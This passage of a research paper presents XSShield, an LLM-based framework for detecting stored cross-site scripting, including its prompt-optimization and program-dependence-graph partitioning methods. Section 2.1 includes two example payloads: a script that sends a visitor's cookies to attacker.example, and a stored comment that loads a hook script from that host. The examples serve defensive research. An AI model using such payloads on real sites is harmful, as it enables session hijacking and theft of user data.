Article

XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding

College of Computer Science and Technology, National University of Defense Technology, No.137 Yanwachi Street, Changsha 410073, China
* Author to whom correspondence should be addressed.
These authors contributed equally to this work.
Appl. Sci. 2025, 15(6), 3348; https://doi.org/10.3390/app15063348
Submission received: 17 February 2025 / Revised: 8 March 2025 / Accepted: 10 March 2025 / Published: 19 March 2025

Abstract

Cross-site scripting attacks represent one of the major security threats facing web applications, with Stored XSS attacks becoming the predominant form. Compared to reflected XSS, stored XSS attack payloads exhibit temporal and spatial asynchrony between injection and execution, rendering traditional browser-side defenses based on request–response differential analysis ineffective. This paper presents XSShield, the first detection framework that leverages a Large Language Model to understand JavaScript semantics to defend against Stored XSS attacks. Through a Prompt Optimizer based on gradient descent and UCB-R selection algorithms, and a Data Adaptor based on program dependence graphs, the framework achieves real-time and fine-grained code processing. Experimental evaluation shows that XSShield achieves 93% accuracy and an F1 score of 0.9266 on the GPT-4 model, improving accuracy by an average of 88.8% compared to existing solutions. The processing time, excluding model communication overhead, averages only 0.205 s, demonstrating practical deployability without significantly impacting user experience.

1. Introduction

Cross-site scripting (XSS) attacks represent one of the primary security threats facing web applications today. As an authoritative reference for web security, the OWASP Top 10 [1] has reflected the industry’s broad consensus on web application security risks since 2003, with XSS attacks consistently ranking in the top ten. In the latest 2021 edition, XSS attacks ranked third (as a major type of injection vulnerability), demonstrating their continued impact on web security. Furthermore, HackerOne’s Hacker-Powered Security Report [2] indicates that XSS vulnerabilities have consistently ranked first among the top ten vulnerabilities disclosed in bug bounty programs for several consecutive years.
Common XSS attacks are primarily categorized into reflected and stored types. In recent years, stored XSS attacks have emerged as the predominant form of XSS attacks, with both their severity and frequency steadily increasing. According to statistics from the official CVE list [3], among the 28,000 vulnerabilities disclosed in 2023, XSS vulnerabilities accounted for 13.2%, with stored XSS attacks comprising 59.5% of these cases, involving over 2200 incidents. A notable example is the stored XSS vulnerability (CVE-2023-40000) [4] discovered in WordPress’s LiteSpeed Cache plugin, which allowed unauthenticated attackers to inject malicious code across entire websites, affecting millions of WordPress sites and demonstrating the widespread impact of stored XSS attacks. The threat of stored XSS attacks further intensified in the first half of 2024, with stored XSS attacks accounting for 15.1% of the 8600 disclosed CVE vulnerabilities, involving over 1300 cases.
The escalating severity of stored XSS attacks can be attributed primarily to their paradigmatic difference from reflected XSS attacks and the long-standing absence of effective defense techniques. While mainstream browsers can identify and block reflected XSS attacks through differential analysis of HTTP requests and responses where injection and execution occur within the same user’s browser, stored XSS attacks present unique challenges due to their temporal and spatial asynchrony between injection and execution phases. In stored XSS attacks, malicious code is typically pre-injected by attackers into server-side systems (such as databases, file systems, or caches) and remains dormant until triggered by users across different sessions and extended time intervals. This temporal and spatial decoupling renders traditional browser-based defense mechanisms ineffective [5], as they struggle to establish correlations between the payload about to be executed and its original injection path, making detection methods based on request–response differential analysis inadequate for addressing stored XSS vulnerabilities.
Specifically, effectively defending against stored XSS attacks faces two key challenges: (1) Difficulty in attack vector localization and identification: Stored XSS malicious code persists on the server side, making traditional differential analysis ineffective in correlating injection and execution paths. Additionally, attackers may employ code obfuscation and camouflage techniques to hide attack code, increasing the difficulty of detection through pattern-matching methods. (2) High requirements for real-time and fine-grained defense systems: In practical application scenarios, attackers often embed malicious code within large amounts of normal code, requiring defense systems to not only quickly identify malicious code to avoid increasing webpage loading delays in users’ browsers but also precisely locate attack code segments to prevent disabling normal webpage functionality over too broad a range. Therefore, defense systems must simultaneously meet high efficiency and high precision requirements.
To address the first challenge, we propose XSShield, a novel client-side detection framework designed to leverage Large Language Models (LLMs) for in-depth semantic analysis of code received by browsers from servers to determine whether it contains potential malicious payloads. Compared to traditional detection methods, XSShield’s uniqueness lies in its ability to achieve detection without relying on differential analysis by deeply understanding code behavior logic and semantic intent, thus overcoming the constraints of “temporal–spatial decoupling”. Furthermore, this approach better handles obfuscated and disguised attack techniques, enhancing detection robustness and flexibility, effectively addressing the limitations of traditional methods when facing complex attack vectors.
To address the second challenge, we designed and implemented two core components of XSShield: (1) the Prompt Optimizer, which dynamically learns and selects optimal prompts based on semantic gradient descent and the Upper Confidence Bound Bandits with Weighted Randomization (UCB-R) selection algorithm. It enables a general pre-trained model to accurately distinguish malicious from normal code, is lightweight and easy to deploy, and significantly improves detection accuracy without notably increasing time costs. (2) The Data Adaptor, which utilizes program dependence graphs (PDGs) and PDG subgraph-partitioning techniques to parse complex JavaScript programs into logically independent code segments while preserving the key semantics closely related to control flow. This process ensures the framework's real-time performance and logical integrity during code analysis, achieving efficient deconstruction of complex code structures. Through fine-grained modeling of program dependencies, the Data Adaptor enables the framework to more precisely identify and process code segments containing malicious payloads.
Experimental results demonstrate XSShield’s exceptional detection accuracy and efficiency. Using GPT-4 as the intelligence foundation, it achieves 93% accuracy and an F1 score of 0.9266 in detecting non-obfuscated attack samples, showing an average 88.8% improvement in accuracy compared to existing malicious code detectors such as Cujo, Zozzle, and JStap (as existing detectors generally struggle to detect stored XSS attacks). Even when facing obfuscated attack samples, XSShield maintains a 64.92% detection rate and a 0.7018 F1 score. Additionally, in terms of performance, XSShield’s average processing time per file is only 0.205 s (excluding model communication overhead), comparable to other detectors’ processing times, demonstrating no significant impact on user experience and proving the framework’s practical deployability.
In summary, the main contributions of this work include:
  • New framework. We propose XSShield, the first detection framework leveraging LLMs’ code semantic understanding capabilities to defend against stored XSS attacks. This framework transcends traditional detection paradigms based on differential analysis and regular expression matching by deeply understanding JavaScript code’s behavioral patterns and semantic intentions, pioneering new approaches to defending against stored XSS attacks.
  • Lightweight, effective and efficient approach. We designed a Prompt Optimizer based on semantic gradient descent and UCB-R selection algorithms, along with a Data Adaptor based on PDGs, achieving code processing that balances real-time performance with fine granularity. Experimental evaluation of XSShield shows that when facing non-obfuscated stored XSS attacks, XSShield achieves an F1 score of 0.9266 on the GPT-4 model, significantly outperforming existing solutions with an average accuracy improvement of 88.8%. XSShield’s average processing time in test data is 0.205 s (excluding model communication overhead), maintaining detection precision while keeping time overhead within a range that does not affect user experience, demonstrating practical deployability.
  • Novel insights. Through extensive experiments and analysis, we uncover several key findings about LLM-based XSS attack defense: (1) the critical role of semantic-aware code representation in attack detection, (2) the impact of prompt optimization on detection accuracy, and (3) the trade-offs between model complexity and detection performance. These insights provide valuable guidance for future research in LLM-based security applications.
The remainder of this paper is organized as follows: Section 2 provides background on XSS attack mechanisms, the limitations of existing defense techniques, and the challenges in defending against stored XSS attacks. Section 3 describes our proposed XSShield framework in detail, including the Prompt Optimizer and Data Adaptor components. Section 4 presents the experimental results and evaluation. Section 5 discusses the implications of our approach, addresses its limitations, and outlines directions for future work. The final section concludes the paper.

2. Background and Motivation

2.1. XSS Attack Mechanisms

XSS is a type of security vulnerability that allows attackers to inject malicious client-side code (typically JavaScript) into web pages viewed by other users. When users visit these compromised pages, the injected code executes in their browsers within the security context of the vulnerable website, potentially leading to severe security consequences. XSS attacks can result in unauthorized access to user data, session hijacking, cookie theft, credential harvesting, and website content tampering [1,6].
The core mechanism of XSS attacks exploits the trust relationship between users and websites. When a website fails to properly validate, sanitize, or encode user-supplied input before incorporating it into its output HTML, attackers can insert malicious scripts that browsers will interpret as legitimate code from the trusted domain. As web applications become increasingly prevalent and complex, the threats posed by XSS attacks continue to escalate, making the in-depth research and development of effective defense methods a critical topic in cybersecurity. Figure 1 illustrates the different types of XSS attacks.
XSS attacks can be categorized into two major types based on how the malicious payload is delivered and made to persist: reflected XSS and stored XSS.
Reflected XSS (non-persistent XSS) is a form of immediate execution attack characterized by embedding malicious scripts within user requests sent to the server, which, without proper validation, are directly reflected back to the user’s browser for execution. This type of attack typically requires active user triggering, such as clicking specific URLs or submitting forms containing malicious payloads. For example:
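Consider the following illustrative case (the endpoint, parameter name, and attacker domain are hypothetical, not taken from the original listing):

<!-- Attacker-crafted link sent to the victim: -->
https://shop.example/search?q=<script>new Image().src='https://attacker.example/c?'+document.cookie</script>
<!-- The server echoes the parameter into the results page unescaped, so the victim's browser renders and executes: -->
<p>Search results for: <script>new Image().src='https://attacker.example/c?'+document.cookie</script></p>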
In this scenario, the malicious script is embedded in the URL query parameter, which is then reflected in the search results page without proper sanitization. For reflected XSS, researchers have developed various effective runtime detection and elimination techniques, such as intercepting scripts after HTML parsing and skipping malicious scripts during the parsing phase. These traffic monitoring-based defense methods can capture the immediate characteristics of attacks, effectively identifying and blocking reflected XSS attacks [7].
In contrast, stored XSS (persistent XSS) exhibits significantly different characteristics, presenting greater challenges for defense. Stored XSS attacks persistently store malicious scripts in the target server’s backend systems (such as databases, file systems, or caches), creating a distinct temporal asynchronicity between the injection and execution phases [8]. For instance:
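Consider the following illustrative scenario (the endpoint, field names, and attacker domain are hypothetical, not taken from the original listing):

<!-- The attacker submits a profile comment whose body contains a script payload: -->
POST /profile/comment
comment=<script src="https://attacker.example/hook.js"></script>
<!-- The comment is persisted server-side; every later visitor to the profile page receives: -->
<div class="comment">
  <script src="https://attacker.example/hook.js"></script>
</div>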
In this example, the malicious payload is stored in the user’s profile (perhaps as a comment or profile description) and executed whenever any user views the profile page. This characteristic makes traditional traffic monitoring-based defense measures inadequate in simultaneously capturing both the injection and execution processes, resulting in significant limitations when addressing stored XSS. Furthermore, stored XSS attacks have higher stealth and broader impact, as their malicious scripts can execute automatically when infected pages are visited, requiring no active user interaction [7].
The severity of stored XSS attacks lies in how their complex operational characteristics further amplify threats to web security. The persistence mechanism allows malicious scripts to remain dormant for extended periods and execute automatically upon user access, forming a persistent attack vector. These malicious codes seamlessly integrate with legitimate web content, demonstrating strong stealth capabilities [9]. A single injection can affect numerous users, creating a multiplier effect, particularly on platforms relying on user-generated content [10]. Moreover, users typically lack security vigilance when interacting with familiar, trusted websites, and stored XSS’s ability to circumvent common defense measures’ limitations further increases the difficulty of defense.
The importance of LLMs in reshaping the landscape of cybersecurity analysis is increasing. With their exceptional capabilities in understanding code structures, identifying patterns, and parsing semantic relationships, LLMs are gradually becoming core components of security analysis systems. Practice has shown that integrating LLMs into security workflows can significantly improve efficiency; for example, LLM-based code scanning systems have demonstrated detection rates several times higher than traditional methods [11,12]. This breakthrough development reflects the deep integration trend between artificial intelligence and cybersecurity, not only pioneering more intelligent security solution pathways but also demonstrating significant value in identifying and defending against complex attack vectors [13,14].

2.2. Motivation

Existing stored XSS defense mechanisms have inherent limitations, highlighting the urgency with respect to developing innovative solutions. Content Security Policy (CSP), as a declarative security measure, heavily depends on the integrity of server-side configurations for its effectiveness. Once attackers gain server access, they can tamper with or disable CSP directives, rendering the defense ineffective [15,16,17]. Additionally, the complexity of CSP implementation and compatibility issues limits its widespread adoption.
Sandbox mechanisms provide protection by executing potentially malicious code in isolated environments, but their practical application faces numerous limitations. Evolving sandbox bypass techniques and limitations in sandbox defense capabilities make it difficult to provide uniform, reliable protection across different systems and browser versions [18]. Furthermore, sandboxes have limited defense scope and are vulnerable to complex side-channel attacks [19].
Traditional filtering techniques [20,21,22,23,24,25,26,27] such as input validation and output encoding are increasingly struggling to cope with modern stored XSS attacks. When servers are compromised, attackers can bypass or disable these protective measures, rendering them ineffective against persistent threats.
These issues are particularly prominent in environments where server integrity cannot be guaranteed, urgently necessitating the redesign of defense strategies. Our research specifically focuses on detecting stored XSS attack vectors in such scenarios where server trustworthiness is compromised. While most existing XSS defense mechanisms operate under the assumption of trusted server environments, this assumption often fails to hold in real-world attack contexts.

2.3. Challenges

In developing effective defense methods against stored XSS attacks, we face two key technical challenges:
The first challenge is the difficulty of attack vector localization and identification. In real-world Web applications, attack code is typically intertwined with large amounts of normal business code, placing stringent requirements on defense systems. On one hand, the system needs to identify and intercept suspicious code in extremely short time frames to prevent attack code execution; on the other hand, it must precisely distinguish between attack code and normal code to avoid affecting normal business logic. The widespread use of code obfuscation, third-party libraries, and dynamic script generation in modern Web development further increases the complexity of code analysis. Defense systems need to maintain sufficient processing speed while ensuring high precision; otherwise, they risk excessive interception or untimely defense. The complexity and dynamic nature of these attack patterns pose significant challenges for identification.
The second challenge is the high requirements for real-time and fine-grained defense systems. Facing the persistent threat of stored XSS attacks, defense systems must be capable of continuous monitoring and real-time response to malicious behavior. Traditional post-event analysis and coarse-grained protection measures struggle to meet this requirement. Real-time defense requires fine-grained monitoring of application execution processes without affecting user experience, promptly detecting and blocking attack attempts. This poses severe challenges to system performance. Additionally, real-time defense must minimize impact on normal functionality while accurately identifying attacks. This requires precise dynamic balancing between security and performance, ensuring effective attack interception while avoiding business interruptions due to excessive defense. This balance between high real-time capability and fine granularity represents a major challenge in defense system design.

3. XSShield Design

To address the challenges in detecting and defending against Stored XSS attacks, this research presents the XSShield framework based on LLMs. The framework enhances detection and defense capabilities through understanding code semantics. Figure 2 illustrates XSShield’s system architecture, with core components including the “Prompt Optimizer” and “Data Adaptor”.
The main technical innovations of this research focus on two aspects. Prompt Optimizer: dynamically selecting optimal prompts by combining semantic gradient descent with the UCB-R selection algorithm to maximize attack vector detection accuracy. Data Adaptor: enabling efficient, fine-grained code analysis through PDGs and PDG subgraph-partitioning techniques.
  • Solution for Challenge 1: LLM-based Semantic Analysis
XSShield addresses the challenge of attack vector identification through LLM-driven deep semantic analysis. Compared to traditional differential analysis methods, XSShield performs comprehensive behavioral and semantic analysis of server-received code to detect potential malicious payloads. The framework effectively identifies attack vectors utilizing obfuscation and disguise techniques through optimized LLM prompts. This approach not only overcomes the limitations of pattern-matching methods but also eliminates dependency on temporal coupling between injection and execution.
  • Solution for Challenge 2: Efficient and Precise Detection Components
To meet stringent performance and precision requirements, XSShield implements two key components:
Prompt Optimizer: This component combines semantic gradient descent and UCB-R selection algorithms to dynamically learn and select optimal prompts. It leverages pre-trained models to accurately distinguish between malicious and normal code, achieving lightweight deployment while maintaining high detection precision without significantly increasing performance overhead.
Data Adaptor: This component employs PDG and PDG subgraph-partitioning techniques to decompose complex JavaScript programs into logically independent code segments while preserving control flow-related semantic information. Through fine-grained modeling of program dependencies, it precisely identifies code segments containing malicious payloads while ensuring real-time performance and logical integrity.
The XSShield framework adopts a semi-automated approach, requiring only the following data for initialization: (1) initial prompt, (2) common JavaScript malicious code samples, (3) benign JavaScript code samples from trusted sources. Additionally, users can provide supplementary attack samples to enhance the prompt-optimization process, improving the effectiveness of final prompts. Through this approach, XSShield can continuously adapt to emerging attack patterns, maintaining the effectiveness of its detection and defense capabilities.

3.1. Prompt Optimizer

We propose a systematic prompt-optimization system to enhance the performance of LLMs in detecting stored XSS attack vectors. This framework comprises three core modules: Prompt Expander implementing semantic gradient descent in discrete optimization space, Prompt Selector based on a UCB-R selection algorithm for balancing exploration and exploitation, and an Optimization Orchestrator implementing adaptive closed-loop optimization. Through this comprehensive approach, we significantly improve prompt effectiveness without modifying the underlying model architecture.

3.1.1. Prompt Expander

The Prompt Expander implements gradient-descent mechanics in semantic space through three tightly coupled steps: (1) performance evaluation (forward pass), which identifies label-prediction mismatches; (2) semantic gradient generation (backward pass), which translates errors into natural-language optimization directions; and (3) prompt updates, which adjust instructions against the computed gradients, all without requiring differentiable parameters. All three steps are implemented by designing prompts that guide the LLM, systematically expanding the search space while maintaining semantic coherence. The specific prompts used are detailed in Appendix B.
Evaluation Phase: We utilize the base model (the LLM used for evaluation) to assess each prompt's performance on a predefined training set. Given a set of prompt candidates $P$, for each prompt $p_i \in P$ we draw a batch sample $D_{\mathrm{train\_sample}}$ from the training data to efficiently obtain prediction results. Subsequently, we identify samples whose predicted labels differ from their true labels, defining them as mismatched samples $D_{\mathrm{mismatch}} = \{ d_j \mid \mathrm{pred}_j \neq \mathrm{label}_j,\ d_j \in D_{\mathrm{train\_sample}} \}$, which serve as the foundation for subsequent optimization.
Gradient Generation Phase: We transform mismatched samples into actionable optimization directions. We analyze error patterns and generate semantic gradients in natural language description form. Compared to traditional numerical gradients, these semantic gradients capture subtle characteristics of prompt deficiencies, providing explicit directional guidance for improvements in semantic space. We design specialized prompts to analyze different types of errors and generate corresponding semantic guidance, effectively identifying specific aspects of prompts requiring enhancement.
Prompt-Update Phase: We implement targeted corrections based on identified deficiencies. This process addresses specific issues through directional edits, adjusting prompts in the opposite direction of semantic gradients. Each optimized prompt is added to the prompt candidates set P, continuously enriching the optimization space.
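A minimal sketch of one Prompt Expander pass is shown below. Here, queryLLM stands in for whichever chat-completion API is used, each training sample is assumed to carry a code string and a ground-truth isMalicious flag, and the gradient and rewrite instructions are illustrative wordings rather than the exact templates from Appendix B.

// One expander pass: evaluate, collect mismatches, generate a semantic
// gradient in natural language, and rewrite the prompt against it.
async function expandPrompt(prompt, trainBatch, queryLLM) {
  // Forward pass: evaluate the current prompt and collect mismatches.
  const mismatches = [];
  for (const sample of trainBatch) {
    const reply = await queryLLM(`${prompt}\n\nCode:\n${sample.code}\nanswer with 'yes' or 'no'`);
    const pred = reply.trim().toLowerCase().startsWith("yes");
    if (pred !== sample.isMalicious) mismatches.push(sample);
  }
  if (mismatches.length === 0) return prompt; // nothing to correct

  // Backward pass: turn the errors into a natural-language "semantic gradient".
  const gradient = await queryLLM(
    `The following detection prompt misclassified ${mismatches.length} JavaScript samples:\n` +
    `${prompt}\n\nMisclassified examples:\n` +
    mismatches.slice(0, 3).map(s => s.code).join("\n---\n") +
    `\nDescribe, in a few sentences, what the prompt fails to capture.`
  );

  // Update step: edit the prompt in the direction opposite to the gradient.
  return queryLLM(
    `Rewrite the prompt below to fix the weaknesses described, keeping it concise.\n` +
    `Prompt:\n${prompt}\nWeaknesses:\n${gradient}`
  );
}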

3.1.2. Prompt Selector

The core challenge in prompt selection lies in effectively balancing exploration of new prompts with exploitation of validated effective prompts. We address this challenge through a UCB-R selection algorithm that combines Upper Confidence Bound principles with weighted random selection strategies.
The algorithm maintains comprehensive performance metrics for each prompt, including success count s i and failure count f i , both initialized to 1. The UCB score calculation combines empirical performance and exploration potential:
$$\mathrm{UCB}_i = \frac{s_i}{s_i + f_i} + c \sqrt{\frac{\ln N}{s_i + f_i}}$$
where the exploration coefficient $c$ dynamically adjusts with the total iteration count $N$, $c = c_0 / N$, ensuring a smooth transition from exploration to exploitation. Unlike traditional UCB selection algorithms that select only the highest-scoring prompt, the UCB-R selection algorithm employs UCB score-weighted random selection, gradually focusing on the most effective candidates while maintaining prompt selection diversity.
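A minimal sketch of the UCB-R scoring and weighted random selection is given below; the per-prompt success and failure counts s[i] and f[i] follow the description above, while the sampling-without-replacement detail is an assumption.

// UCB score for prompt i, given its success/failure counts and iteration count N.
function ucbScore(s, f, c, N) {
  return s / (s + f) + c * Math.sqrt(Math.log(N) / (s + f));
}

// Weighted random draw of k prompts, using UCB scores as weights, instead of
// always taking the single top-scoring prompt as standard UCB would.
function ucbrSelect(prompts, s, f, c0, N, k) {
  const c = c0 / N; // exploration coefficient decays with the iteration count
  const pool = prompts.map((p, i) => ({ p, w: ucbScore(s[i], f[i], c, N) }));
  const selected = [];
  for (let j = 0; j < k && pool.length > 0; j++) {
    const total = pool.reduce((acc, x) => acc + x.w, 0);
    let r = Math.random() * total;
    let idx = 0;
    while (r > pool[idx].w && idx < pool.length - 1) { r -= pool[idx].w; idx++; }
    selected.push(pool[idx].p);
    pool.splice(idx, 1); // sample without replacement
  }
  return selected;
}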

3.1.3. Optimization Orchestrator

The Optimization Orchestrator coordinates the entire optimization workflow through an iterative process described in Algorithm 1. To rigorously evaluate performance, we employ a comprehensive loss function to measure cumulative prompt effectiveness over T optimization rounds:
$$\mathrm{Loss} = \frac{1}{T\,|D_{\mathrm{test}}|} \sum_{i=1}^{T} \mathrm{Manh}\big(\mathrm{pred}_p(D_{\mathrm{test}}),\ \mathrm{label}(D_{\mathrm{test}})\big)$$
where Manh represents the Manhattan distance (the sum of absolute differences between vector components), defined as $\mathrm{Manh}(A, B) = \sum_i |A_i - B_i|$. Based on this metric, the optimal prompt $p^*$ is formally defined as:
$$p^{*} = \arg\min_{p \in P} \frac{1}{|D_{\mathrm{test}}|}\, \mathrm{Manh}\big(\mathrm{pred}_p(D_{\mathrm{test}}),\ \mathrm{label}(D_{\mathrm{test}})\big)$$
To balance evaluation accuracy and computational efficiency, we implement a refined batch sampling strategy during training and testing phases. Prompt performance scores directly update UCB statistics, forming a robust feedback loop that continuously guides the optimization process toward more effective prompts.
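The per-round loss used inside the selector can be sketched as follows; for binary 0/1 prediction and label vectors, the mean Manhattan distance reduces to the misclassification rate.

// Per-prompt loss on a test batch: mean Manhattan distance between the 0/1
// prediction vector and the ground-truth label vector.
function manhattanLoss(preds, labels) {
  let sum = 0;
  for (let i = 0; i < labels.length; i++) sum += Math.abs(preds[i] - labels[i]);
  return sum / labels.length; // for binary vectors this equals the misclassification rate
}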

3.2. Data Adaptor

Precise detection of stored XSS attacks through prompt optimization requires a sophisticated data-adaptation process. This process transforms JavaScript code extracted from browsers into formats suitable for LLM analysis. Our process contains three core components, PDG Generator, PDG Partitioner, and Code Representation Generator, each serving specific functions in the adaptation process.

3.2.1. PDG Generator

The PDG is an advanced extension of the Abstract Syntax Tree (AST), integrating control and data dependency information. This integration enhances code deconstruction and analysis efficiency through fine-grained AST operations, particularly benefiting code logical partitioning and behavioral representation.
Algorithm 1 Prompt-Optimization Workflow.
  • Input: Initial prompt p_0, datasets D_train, D_test, exploration coefficient c_0, epochs T, selection size k
  • Output: Optimized prompt p* and prompt set P
/* Prompt Expander */
 1: procedure PromptExpander(p, D_train)
 2:     D_sample ← Sample(D_train, batch_size)
 3:     pred ← EvaluatePrompt(p, D_sample)
 4:     D_mismatch ← {d_j | pred_j ≠ label_j}
 5:     gradient ← GenerateGradient(p, D_mismatch)
 6:     return UpdatePrompt(p, gradient)
 7: end procedure
/* Prompt Selector */
 8: procedure PromptSelector(P, D_test, c, s, f, N)
 9:     D_sample ← Sample(D_test, batch_size)
10:     for all p_i ∈ P do
11:         Loss_i ← (1/|D_test|) · Manh(pred_{p_i}(D_test), label)
12:         score_i ← 1 − Loss_i
13:         sampled_prompts ← weighted_rand_k_{p_i ∈ P}( s_i/(s_i + f_i) + c·√(ln N/(s_i + f_i)) )
14:         s_i ← s_i + score_i × |D_sample|
15:         f_i ← f_i + (1 − score_i) × |D_sample|
16:     end for
17:     return sampled_prompts, s, f
18: end procedure
/* Optimization Orchestrator */
19: Initialize P ← {p_0}, s ← 1^|P|, f ← 1^|P|, Loss_best ← ∞
20: for epoch t = 1 to T do
21:     P_expanded ← P
22:     for all p_i ∈ P do
23:         p_new ← PromptExpander(p_i, D_train)
24:         P_expanded ← P_expanded ∪ {p_new}
25:     end for
26:     P, s, f ← PromptSelector(P_expanded, D_test, c, s, f, t)
27:     c ← c_0 / t
28:     for all p_i ∈ P do
29:         Loss_i ← (1/|D_test|) · Manh(pred_{p_i}(D_test), label)
30:         if Loss_i < Loss_best then
31:             Loss_best ← Loss_i
32:             p* ← p_i
33:         end if
34:     end for
35: end for
36: return p*
PDG Construction adopts a systematic approach to transform JavaScript code into complete dependency graphs. The process begins with parsing code into AST to establish hierarchical structure, followed by multi-stage transformation: First, comprehensive analysis of data and control flow dependencies maps variable definitions and references through systematic AST traversal, establishing data dependency edges. Simultaneously, analysis of program branch patterns and conditional logic establishes control dependency relationships, ensuring accurate representation of execution paths. Finally, expression nodes in the PDG (operations such as assignments and calculations, derived from Esprima) and their subtrees are identified and integrated as semantically complete units for subsequent analysis. Here, we reference the implementation from GitHub repository [28] for PDG construction.
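As a rough illustration of the first construction step, the sketch below parses code with Esprima and records which identifiers each top-level statement defines and uses, which is the raw material for data-dependency edges; the full construction (control dependencies, expression-subtree folding) follows the referenced repository [28]. Member-expression properties and assignment targets are not distinguished in this simplified collector.

// Rough def/use collection over top-level statements using the esprima parser.
const esprima = require("esprima");

function collectDefUse(code) {
  const ast = esprima.parseScript(code, { loc: true });
  const statements = ast.body.map(stmt => {
    const defs = [];
    const uses = [];
    (function walk(n) {
      if (!n || typeof n.type !== "string") return;
      if (n.type === "VariableDeclarator") {
        if (n.id.type === "Identifier") defs.push(n.id.name); // definition site
        walk(n.init);
        return;
      }
      if (n.type === "Identifier") {
        uses.push(n.name); // (over-approximate) use site
        return;
      }
      for (const key of Object.keys(n)) {
        if (key === "loc") continue;
        const child = n[key];
        if (Array.isArray(child)) child.forEach(walk);
        else if (child && typeof child === "object") walk(child);
      }
    })(stmt);
    return { line: stmt.loc.start.line, defs, uses };
  });
  // A data-dependency edge s1 -> s2 is added whenever s2 uses a name s1 defines.
  return statements;
}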
PDG Pruning employs three optimization strategies to improve PDG efficiency while preserving core semantic information: control flow optimization, data flow optimization, and dead code elimination.
Control Flow Optimization. This merges statement nodes with single child nodes into unified nodes while preserving parent–child information. For each statement node s with a single child node c, it performs folding operations to create compound nodes, reducing graph complexity while maintaining control flow semantics integrity.
Data Flow Optimization. This implements two complementary mechanisms: constant propagation and copy propagation. Constant propagation identifies and propagates statically computable expressions in the graph, while copy propagation tracks assignment operations, optimizing variable usage by replacing copied variables with original values. These mechanisms work collaboratively to enhance code efficiency through systematic value propagation and variable optimization.
Dead Code Elimination. This focuses on removing two types of redundant code: print operations used for debugging or logging, and executable but unused code segments. This systematic elimination significantly reduces PDG size while maintaining program core logic and functionality.

3.2.2. PDG Partitioner

We propose a novel partitioning method for PDGs of large-scale JavaScript programs, employing an optimized community detector. This method aims to decompose PDGs into logical subgraphs to simplify analysis while preserving fundamental semantic properties of the original program. To achieve this, we developed an enhanced partitioning strategy that emphasizes the distinctions between control flow and data flow dependencies. Recognizing that control flow typically contains more critical program semantics, our method assigns higher importance to control flow dependencies to better maintain functional integrity of partitioned PDGs.
As shown in Algorithm 2, the method encompasses two core phases: weighted graph construction and community detection. The relevant symbols are defined as follows:
$G = (V, E, w)$: weighted undirected graph derived from the PDG.
$w_c, w_d$: weights for control flow and data flow edges.
$\theta_{ast}$: upper limit on the number of AST nodes allowed in each community.
$Q$: modularity measure for community detection.
$N_{AST}(C)$: number of AST nodes in community $C$.
Phase 1: Weighted Graph Constructor. The first phase involves transforming the input PDG into a weighted undirected graph $G$. Edges representing control flow dependencies are assigned higher weights ($w_c$), while edges representing data flow dependencies receive lower weights ($w_d$). This weighting scheme ($w_c \gg w_d$) emphasizes the critical role of control flow in determining code functional structure.
Phase 2: Enhanced Community Detector. The second phase employs an improved variant of the Louvain algorithm, specifically adapted for JavaScript’s unique characteristics. This enhanced algorithm optimizes the modularity measure Q, calculated as:
$$Q = \frac{1}{2m} \sum_{i,j} \left[ w_{ij} - \frac{k_i k_j}{2m} \right] \delta(c_i, c_j) - \lambda \sum_{C} \max\big(0,\ N_{AST}(C) - \theta_{ast}\big)$$
where $m$ denotes the total edge weight, $w_{ij}$ represents the weight of the edge between nodes $i$ and $j$, $k_i$ is the weighted degree of node $i$, and $c_i$ represents the community containing node $i$. The Kronecker delta function $\delta$ is used to assess whether nodes $i$ and $j$ belong to the same community. The additional penalty term $\lambda \sum_{C} \max(0,\ N_{AST}(C) - \theta_{ast})$ ensures that the number of AST nodes in each community remains below the predefined limit $\theta_{ast}$, where $\lambda$ is a penalty coefficient that controls the importance of this constraint.
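A small sketch of the added penalty term is given below; the communities map (community id to member PDG nodes) and the astNodes helper are assumptions about the surrounding implementation.

// AST-size penalty subtracted from the standard modularity score Q.
function astPenalty(communities, astNodes, thetaAst, lambda) {
  let penalty = 0;
  for (const members of Object.values(communities)) {
    const size = members.reduce((total, v) => total + astNodes(v), 0);
    penalty += Math.max(0, size - thetaAst); // only oversized communities are penalized
  }
  return lambda * penalty;
}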
Algorithm 2 PDG Partitioning via Community Detection.
  • Input: Program Dependence Graph G(V, E), control weight w_c, data weight w_d, AST node limit θ_ast
  • Output: Set of program subgraphs S
/* Phase 1: Weighted Graph Constructor */
 1: for all edges e ∈ E do
 2:     if e ∈ ControlFlow(G) then
 3:         w(e) ← w_c
 4:     else
 5:         w(e) ← w_d
 6:     end if
 7: end for
/* Phase 2: Enhanced Community Detector */
 8: C ← {{v} : v ∈ V}
 9: Q_prev ← −∞
10: Q_curr ← Modularity(G, C)
11: while Q_curr > Q_prev do
12:     for all v ∈ V do
13:         c* ← argmax_{c ∈ C} ΔQ(v, c)
14:         if N_AST(c*) + ASTNodes(v) ≤ θ_ast then
15:             Reassign v to community c*
16:         else
17:             Create new community for v
18:         end if
19:     end for
20:     C ← Aggregate(C)
21:     Q_prev ← Q_curr
22:     Q_curr ← Modularity(G, C)
23: end while
24: return C
During community detection, we ensure that the number of AST nodes in each community does not exceed the predefined limit $\theta_{ast}$. If adding a node to a community would result in $N_{AST}(C) > \theta_{ast}$, that node is assigned to a different community or creates a new one. This ensures that generated subgraphs, when provided as input to the LLM, maintain controlled token length.
Our modifications to the Louvain algorithm [29] aim to maximize $Q$ while efficiently identifying well-formed, functionally meaningful subgraphs consistent with JavaScript program structures. The modularity gain $\Delta Q$ when relocating node $i$ to community $C$ is calculated as:
$$\Delta Q = \left[ \frac{\Sigma_{in} + k_{i,in}}{2m} - \left( \frac{\Sigma_{tot} + k_i}{2m} \right)^{2} \right] - \left[ \frac{\Sigma_{in}}{2m} - \left( \frac{\Sigma_{tot}}{2m} \right)^{2} - \left( \frac{k_i}{2m} \right)^{2} \right] - \lambda \cdot \Delta N_{AST}(C)$$
where $\Sigma_{in}$ represents the total weight of edges within community $C$, $k_{i,in}$ is the weight of edges connecting node $i$ to other nodes in community $C$, $\Sigma_{tot}$ represents the total weight of all edges connected to nodes in community $C$, $k_i$ is the total weight of all edges connected to node $i$, and $\Delta N_{AST}(C)$ represents the change in the AST node constraint when adding node $i$ to community $C$. Through this penalty term, the modularity calculation directly incorporates the AST node constraints.
Through this method, our enhanced community-detection algorithm efficiently identifies well-structured and functionally clear subgraphs that maintain consistency with the overall structure of JavaScript programs.

3.2.3. Code Representation Generator

